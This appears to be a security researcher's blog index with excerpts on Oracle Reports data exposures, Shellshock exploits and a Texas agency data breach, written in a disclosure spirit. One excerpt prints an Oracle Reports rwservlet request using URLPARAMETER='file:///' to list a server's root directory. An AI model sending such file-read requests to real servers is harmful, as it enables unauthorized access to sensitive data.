Welcome to the NI@root Blog

This blog will contain pretty much anything NI@root feels is worth publishing. This will include, but not be limited to; Stuffz

Operation Oracle Reports Anti-Databreach

I think there has been enough media attention to Oracle Reports data exposures and hopefully there are less exposures than there were a couple of months ago. I have decided to automate the testing of Oracle Reports servers in the US for possible data exposures as well as servers that are vulnerable to exploits that

Read More

Massive Oracle Reports Data Exposures

Before coming to Phoenix for a pentest contract I had done research and discovered around 30 sensitive data exposures on systems that were managed by state government, county school systems, medical establishments, dental, higher education and more. I had contacted the Philadelphia FBI office and at first they seemed interested in helping me but then

Read More

Shellshock – CVE-2014-6271 – Exploits in the Wild

*note* This page is being updated as new information comes in. For those who run web applications that could be an attack vector for the BashBug, a.k.a Shellshock, you may want to take this VERY seriously. There are already 4 Metasploit modules in the works. Pull #3880 modules/auxiliary/admin/http/bash_env.rb <- conformed by NI@root Pull #3882 osx vmware/bash priv escalation

Read More

Goofy Oracle Reports URLPARAMETER Stuffz

I have already tried to exploit this and it seems it can’t be, or would be very difficult to exploit so I am going to publish this here. Short and sweet. To exploit a vulnerable Oracle Reports server using the URLPARAMETER goes like this. /reports/rwservlet?report=test.rdf+desformat=html+destype=cache+ JOBTYPE=rwurl+URLPARAMETER=”file:///” This will give you the root directory of the

Read More

Breach – Texas Department of Family and Protective Services

Thank you Rhino Security Labs! http://www.rhinosecuritylabs.com/oracle-data-exposure-vulnerability/ I am Dana Taylor, founder of NI@root and Lead Researcher at Rhino Security Labs. I recently discovered a significant exposure of data on a government server for Texas Department of Family and Protective Services. The data found was incredibly sensitive and should never have been publicly available. As reported by

Read More